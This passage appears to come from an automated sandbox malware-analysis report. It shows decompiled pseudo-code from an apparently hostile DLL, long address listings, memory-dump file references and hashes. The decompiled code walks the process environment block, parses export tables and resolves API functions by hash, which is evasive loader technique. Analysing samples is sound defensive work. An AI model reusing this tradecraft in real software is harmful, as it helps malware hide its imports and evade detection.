					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6eb39377
0x6eb3937b
0x6eb39387
0x6eb3938b
0x6eb3938f
0x6eb39394
0x6eb39397
0x6eb39399
0x6eb3939b
0x6eb3939b
0x6eb3939e
0x6eb393a4
0x6eb3941c
0x6eb39420
0x6eb39423
0x6eb39423
0x6eb39426
0x00000000
0x6eb39426
0x6eb393ab
0x6eb39413
0x6eb39417
0x00000000
0x6eb39417
0x6eb393b2
0x6eb3940b
0x6eb3940e
0x00000000
0x6eb3940e
0x6eb393b7
0x6eb393f5
0x6eb393fc
0x6eb393ff
0x6eb393c8
0x6eb393c8
0x6eb393ce
0x00000000
0x00000000
0x6eb393d3
0x6eb393ed
0x6eb393f0
0x00000000
0x6eb393f0
0x6eb393d8
0x00000000
0x6eb393da
0x6eb393de
0x6eb393e1
0x00000000
0x6eb393e1
0x6eb393d8
0x6eb39429
0x6eb39429
0x6eb39429
0x6eb39432
0x6eb3943b
0x6eb3943e
0x6eb39441
0x6eb39444
0x6eb39447
0x6eb3944d
0x6eb3948f
0x6eb39492
0x6eb39493
0x6eb3949a
0x6eb3949d
0x6eb3944f
0x6eb39453
0x6eb3945d
0x6eb39464
0x6eb39466
0x6eb3947f
0x6eb39482
0x6eb39482
0x6eb39464
0x6eb394a5
0x6eb394a8
0x6eb394ab
0x6eb394af
0x6eb394b3
0x6eb394bd
0x6eb394c1
0x6eb394cb
0x6eb394d4
0x6eb394e1
0x6eb394e4
0x6eb394e7
0x6eb394e7
0x6eb394f3
0x6eb394fe
0x6eb39504
0x6eb39508
0x6eb394f5
0x6eb394f5
0x6eb394f5
0x6eb39510
0x6eb3953a
0x6eb39540
0x6eb39540
0x6eb39548
0x6eb398f1
0x6eb398f7
0x6eb398fd
0x6eb398fd
0x00000000
0x6eb3954e
0x6eb3954e
0x6eb39552
0x6eb39555
0x6eb39558
0x6eb3955b
0x6eb3955f
0x6eb39561
0x6eb39564
0x6eb39567
0x6eb3956b
0x6eb39570
0x6eb39573
0x6eb39577
0x6eb3957c
0x6eb3957f
0x6eb39581
0x6eb39584
0x6eb39588
0x6eb3958d
0x6eb3959d
0x6eb395a3
0x6eb395a3
0x6eb395ab
0x6eb395ad
0x6eb395b6
0x6eb395b8
0x6eb395bb
0x6eb395c6
0x6eb395f3
0x6eb395c8
0x6eb395df
0x6eb395df
0x6eb395fb
0x6eb39601
0x6eb39607
0x6eb39607
0x6eb395fb
0x6eb395b6
0x6eb3960e
0x6eb3967f
0x6eb39684
0x6eb396dd
0x6eb3979f
0x6eb397a4
0x6eb397b3
0x6eb397b9
0x6eb397bd
0x6eb397c6
0x6eb397cd
0x6eb397d6
0x6eb397e4
0x6eb397e7
0x6eb397cf
0x6eb397cf
0x6eb397cf
0x6eb397cd
0x6eb397f0
0x6eb3981d
0x6eb39830
0x6eb39838
0x6eb3981f
0x6eb39821
0x6eb39829
0x6eb39829
0x6eb397f2
0x6eb397f7
0x6eb39816
0x6eb397f9
0x6eb397fe
0x6eb3980f
0x6eb39800
0x6eb39800
0x6eb39800
0x6eb397fe
0x6eb397f7
0x6eb39840
0x6eb3984f
0x6eb3985c
0x6eb39865
0x6eb39869
0x6eb3986d
0x6eb39870
0x6eb39873
0x6eb39876
0x6eb39879
0x6eb3987c
0x6eb39882
0x6eb39886
0x6eb3988c
0x6eb3988c
0x6eb39882
0x6eb39892
0x6eb398cf
0x6eb398d3
0x6eb398da
0x6eb398e0
0x6eb39894
0x6eb39897
0x6eb398b7
0x6eb398bb
0x6eb398c2
0x6eb398c9
0x6eb39899
0x6eb3989c
0x6eb3989e
0x6eb398a2
0x6eb398ac
0x6eb398b2
0x6eb398b2
0x6eb3989c
0x6eb39897
0x6eb398e7
0x6eb398e7
0x6eb39900
0x6eb39900
0x6eb39906
0x6eb3990b
0x6eb39965
0x6eb3996a
0x6eb399a9
0x6eb399ae
0x6eb399b0
0x6eb399b4
0x6eb399b7
0x6eb399ba
0x6eb399bc
0x6eb399bd
0x6eb399bd
0x6eb399c2
0x6eb399e0
0x6eb399e2
0x6eb399e6
0x6eb399ec
0x6eb399ef
0x6eb399f1
0x6eb399f2
0x6eb399f2
0x00000000
0x6eb399c4
0x6eb399c4
0x6eb399c4
0x6eb399c8
0x6eb399ce
0x6eb399d1
0x6eb399d3
0x6eb399d6
0x6eb399f5
0x6eb399f5
0x6eb399fc
0x6eb39a16
0x6eb399fe
0x6eb399fe
0x6eb39a0a
0x6eb39a0b
0x6eb39a0e
0x6eb39a0e
0x6eb39a24
0x6eb39a24
0x6eb399c2
0x6eb3996f
0x6eb3997d
0x6eb39995
0x6eb39999
0x6eb3999c
0x6eb399a2
0x6eb399a6
0x6eb399a6
0x00000000
0x6eb399a6
0x6eb3997f
0x6eb39983
0x6eb39989
0x6eb39989
0x6eb3998f
0x00000000
0x6eb3998f
0x6eb39971
0x6eb39975
0x00000000
0x6eb39975
0x6eb3990f
0x6eb3993b
0x6eb39953
0x6eb39957
0x6eb3995a
0x6eb3995d
0x6eb3995f
0x6eb39962
0x6eb3993d
0x6eb3993d
0x6eb39941
0x6eb39944
0x6eb39947
0x6eb3994a
0x6eb3994d
0x6eb3994d
0x00000000
0x6eb3993b
0x6eb39915
0x00000000
0x00000000
0x6eb3991b
0x6eb3991f
0x6eb39925
0x6eb39928
0x6eb3992b
0x6eb3992e
0x00000000
0x6eb3992e
0x6eb397a6
0x6eb397aa
0x6eb397b0
0x00000000
0x6eb397b0
0x6eb396e8
0x6eb396fa
0x6eb396ff
0x6eb3976a
0x00000000
0x00000000
0x6eb39771
0x6eb39797
0x6eb3979b
0x00000000
0x00000000
0x6eb3977a
0x6eb3977f
0x6eb39793
0x00000000
0x00000000
0x00000000
0x6eb39795
0x6eb39786
0x00000000
0x00000000
0x6eb3978b
0x00000000
0x00000000
0x6eb3978d
0x00000000
0x6eb39771
0x6eb39701
0x6eb3970b
0x6eb3971c
0x6eb3971f
0x6eb39722
0x6eb39728
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb3972e
0x6eb3972e
0x6eb3972e
0x6eb39735
0x00000000
0x00000000
0x6eb39737
0x6eb3973a
0x6eb39740
0x00000000
0x00000000
0x00000000
0x6eb39742
0x6eb39744
0x6eb3974d
0x00000000
0x00000000
0x6eb39761
0x00000000
0x00000000
0x00000000
0x6eb39763
0x6eb396ef
0x00000000
0x00000000
0x00000000
0x6eb396f5
0x6eb39689
0x6eb396b8
0x6eb396b9
0x6eb396c2
0x00000000
0x6eb396d3
0x00000000
0x6eb396d3
0x6eb39690
0x6eb39693
0x6eb396a6
0x6eb396a7
0x6eb396ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb39693
0x6eb39689
0x6eb39615
0x6eb39672
0x6eb39676
0x6eb3967c
0x00000000
0x6eb3967c
0x6eb39617
0x6eb3961b
0x6eb39628
0x6eb3962c
0x6eb39642
0x6eb3964a
0x6eb3962e
0x6eb39630
0x6eb3963a
0x6eb3963a
0x6eb39650
0x6eb39659
0x6eb39670
0x00000000
0x00000000
0x00000000
0x6eb39670
0x6eb3965b
0x6eb3965b
0x00000000
0x6eb39650

Strings

, xrefs: 6EB399DB

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 312435036a75592d7eaf710f3fa4ab0cf1e164b7bfdc42f26621520821e56073
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: A622B13040D3E6CBD715CE99C4A236ABFE0FF86300F20896DE9E547299DB359945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6EB3143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6EB3143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6EB30304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6eb3d208 == 0 ||  *0x6eb3d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6EB34FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6eb3d2f0 |  *0x6eb3d2f1;
									if(( *0x6eb3d2f0 |  *0x6eb3d2f1) == 0) {
										_t525 =  *0x6eb3d208; // 0x26d1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6eb3d2f0 = 1;
											_t526 = E6EB3361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6EB31C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6eb3d208 = _t526;
											 *0x6eb3d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6EB3361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6EB31C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6EB2DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6EB2DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6eb3d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6eb3d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6EB2E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6EB3306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6eb3d2e4 = 1;
					E6EB2F584( &(_t535[0x38]), 0);
					E6EB2F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6EB2F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6EB3306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6EB2F828( &(_t535[0xc]), E6EB2F4CC( &(_t535[8])) + 0x14);
								_t369 = E6EB2F4BC( &(_t535[0xc]), E6EB2F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6EB2F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6EB2F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6EB2F654( &(_t535[8]));
							E6EB2F654( &(_t535[0x164]));
							E6EB2F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6EB2F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6EB31D34(0x60a28c5c);
							_t290 = E6EB312EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6EB31C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6EB2D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6EB35CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6EB35D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6EB38E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6EB2F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6EB2BB44( &(_t535[0x110]));
							}
							E6EB2CFDC( &(_t535[0x104]));
							E6EB2CFDC(_t518);
							E6EB2CFDC( &(_t535[0x15c]));
							E6EB2CFDC( &(_t535[0x154]));
							E6EB390EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6EB2F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6EB390B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6EB2F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6EB2F4CC( &(_t535[0x44]));
								_t519 =  *(0x6eb3bd40 + _t381 * 4);
								_t531 = E6EB3907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6EB387E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6EB2F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6EB2F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6EB2F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6EB2F828( &(_t535[0x20]), E6EB2F4CC( &(_t535[0x1c])) + 8);
										E6EB2F4BC( &(_t535[0x20]), E6EB2F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6EB3317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6EB2F828( &(_t535[0x48]), _t535[0x70]);
									E6EB3317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6EB2F840( &(_t535[0x44]), _t563);
									E6EB2F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6EB3913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6EB39104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6EB2F654( &(_t535[0x144]));
									E6EB2F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6eb3d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6EB2F654( &(_t535[0x11c]));
							E6EB38E68(_t381,  &(_t535[0xd8]));
							E6EB2F654( &(_t535[0x1c]));
							E6EB2F654( &(_t535[0x44]));
							E6EB2F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6EB2F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6EB2F828( &(_t535[0x38]), E6EB2F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6EB2F4BC( &(_t535[0x38]), E6EB2F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6EB2F4BC( &(_t535[0xc]), _t62);
						_t455 = E6EB2F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6eb31448
0x6eb3144f
0x6eb31452
0x6eb31459
0x6eb31bdb
0x6eb31bdb
0x6eb3145f
0x6eb3146a
0x6eb319a9
0x6eb319ad
0x00000000
0x6eb31c2c
0x6eb319b3
0x6eb319b6
0x6eb319b9
0x6eb319c3
0x6eb319d2
0x6eb319d4
0x6eb319db
0x6eb31bc5
0x6eb31bc7
0x6eb31bca
0x6eb31bce
0x00000000
0x6eb31bce
0x6eb319ea
0x6eb319f5
0x6eb319fc
0x6eb319ff
0x6eb31a01
0x6eb31a04
0x6eb31a07
0x6eb31a0d
0x6eb31a1b
0x6eb31a2b
0x6eb31a50
0x6eb31a61
0x6eb31a64
0x6eb31a66
0x6eb31aca
0x6eb31acd
0x6eb31acd
0x6eb31acf
0x6eb31ad2
0x6eb31ad6
0x6eb31ad6
0x6eb31ada
0x00000000
0x00000000
0x6eb31ae7
0x6eb31aed
0x6eb31b21
0x6eb31b27
0x6eb31b29
0x6eb31bf8
0x6eb31c00
0x6eb31c03
0x6eb31c05
0x6eb31c1c
0x6eb31c1c
0x6eb31c07
0x6eb31c0b
0x6eb31c10
0x6eb31c10
0x6eb31c1e
0x6eb31c24
0x6eb31b43
0x6eb31b43
0x6eb31b45
0x6eb31b45
0x6eb31b47
0x6eb31b47
0x6eb31b4c
0x00000000
0x00000000
0x6eb31b4e
0x6eb31b4f
0x6eb31b52
0x6eb31b55
0x00000000
0x00000000
0x6eb31b61
0x6eb31b64
0x6eb31b66
0x6eb31b7d
0x6eb31b7d
0x6eb31b68
0x6eb31b6c
0x6eb31b71
0x6eb31b71
0x6eb31b8a
0x6eb31b8d
0x6eb31b96
0x6eb31b99
0x6eb31bbc
0x6eb31bc0
0x00000000
0x6eb31bc0
0x6eb31ba1
0x6eb31ba1
0x6eb31bad
0x6eb31bb0
0x6eb31bb9
0x00000000
0x6eb31bb9
0x6eb31b2f
0x6eb31b3f
0x6eb31b3f
0x6eb31b41
0x00000000
0x00000000
0x6eb31b37
0x6eb31b39
0x6eb31b39
0x00000000
0x6eb31b3f
0x6eb31aef
0x6eb31af7
0x6eb31b17
0x6eb31af9
0x6eb31af9
0x6eb31b01
0x6eb31b0a
0x6eb31b0a
0x6eb31b01
0x00000000
0x6eb31af7
0x6eb31a68
0x6eb31a6f
0x00000000
0x00000000
0x6eb31a7c
0x6eb31a82
0x6eb31a87
0x6eb31a8e
0x6eb31a92
0x6eb31aa7
0x6eb31aa9
0x6eb31aab
0x6eb31ab1
0x6eb31abf
0x6eb31abf
0x6eb31ac5
0x00000000
0x6eb31ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb31a0f
0x6eb31a0f
0x6eb31a0f
0x6eb31a10
0x6eb31a13
0x6eb31a17
0x00000000
0x6eb31a2d
0x6eb31a30
0x6eb31a33
0x6eb31a3c
0x6eb31a3f
0x6eb31a40
0x6eb31a42
0x00000000
0x6eb3147d
0x6eb3147f
0x6eb31484
0x6eb3148f
0x6eb3149d
0x6eb314b0
0x6eb314bd
0x6eb314c6
0x6eb314ca
0x6eb314ce
0x6eb31516
0x6eb31516
0x6eb31518
0x6eb3151f
0x00000000
0x00000000
0x6eb31538
0x6eb31540
0x6eb31544
0x6eb31559
0x6eb3155d
0x6eb31561
0x6eb3156a
0x6eb31570
0x6eb31573
0x6eb31577
0x6eb3157f
0x6eb31581
0x6eb31585
0x6eb3158c
0x6eb31595
0x6eb31595
0x6eb31599
0x6eb315ae
0x6eb315c4
0x6eb315d1
0x6eb315d2
0x6eb315d2
0x6eb315d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb3158e
0x6eb3158e
0x6eb3158e
0x6eb3158f
0x6eb31590
0x00000000
0x6eb3158e
0x6eb31553
0x6eb31557
0x00000000
0x00000000
0x00000000
0x6eb315d8
0x6eb315d8
0x6eb315d9
0x6eb315dc
0x6eb315e6
0x6eb315e6
0x6eb315ea
0x6eb315f1
0x6eb3164c
0x6eb31651
0x6eb316a4
0x6eb316a4
0x6eb316a8
0x6eb316ac
0x6eb314d6
0x6eb314d9
0x6eb314de
0x6eb314e4
0x6eb314e7
0x6eb314ee
0x6eb314f2
0x6eb314f9
0x6eb31502
0x6eb31506
0x6eb3150a
0x6eb31510
0x00000000
0x00000000
0x00000000
0x6eb31510
0x6eb316b6
0x6eb316c2
0x6eb316cd
0x6eb316d4
0x6eb316dd
0x6eb316e7
0x6eb316e8
0x6eb316f6
0x6eb316fb
0x6eb316fc
0x6eb31709
0x6eb3170e
0x6eb31720
0x6eb31725
0x6eb3172a
0x6eb3173c
0x6eb3174e
0x6eb31753
0x6eb3175e
0x6eb31765
0x6eb3176a
0x6eb31772
0x6eb3177b
0x6eb3177b
0x6eb31787
0x6eb3178e
0x6eb3179a
0x6eb317a6
0x6eb317b4
0x6eb317c5
0x6eb317cc
0x6eb317d1
0x6eb317da
0x6eb317df
0x6eb317e1
0x6eb317e5
0x6eb317e9
0x6eb317f6
0x6eb31803
0x6eb31807
0x6eb3181b
0x6eb3181f
0x00000000
0x00000000
0x6eb31834
0x6eb31836
0x6eb3183e
0x6eb3183b
0x6eb3183b
0x6eb3183b
0x6eb31842
0x6eb31844
0x6eb3184a
0x6eb31850
0x6eb318ac
0x6eb318b5
0x6eb318b9
0x6eb318c6
0x6eb318cf
0x6eb318d4
0x6eb318d8
0x6eb318db
0x6eb3193c
0x6eb31952
0x6eb3195d
0x6eb3195e
0x6eb3195f
0x6eb31963
0x6eb31966
0x6eb31be6
0x6eb31be9
0x6eb31be9
0x00000000
0x6eb31966
0x6eb318e5
0x6eb318f5
0x6eb318fe
0x6eb31907
0x6eb31910
0x6eb31911
0x6eb31912
0x6eb31917
0x6eb3191f
0x6eb31927
0x00000000
0x00000000
0x00000000
0x6eb31929
0x6eb31859
0x6eb3185e
0x6eb31862
0x6eb31862
0x6eb31866
0x6eb31869
0x00000000
0x00000000
0x6eb3188a
0x6eb3188c
0x6eb31890
0x6eb31892
0x00000000
0x00000000
